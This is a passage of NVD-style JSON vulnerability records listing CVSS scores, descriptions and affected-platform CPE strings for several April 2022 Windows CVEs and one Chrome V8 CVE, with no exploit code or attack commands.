"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-22T17:05:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24497", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:53", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24497.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24491", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-22T17:48:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24491", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:01", "description": "Windows Server Service Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24541", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-04-25T15:44:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24541", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24541", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:51", "description": "Windows Kernel Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24483", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2022-04-22T18:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-24483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24483", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:38", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26904", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-26T14:08:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-26904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:54", "description": "Windows SMB Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24500", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-04-22T15:54:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24500", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24500", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:13:06", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "cve", "title": "CVE-2022-1096", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "cpe": [], "id": "CVE-2022-1096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:27:58", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24481.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24521", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-22T15:26:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 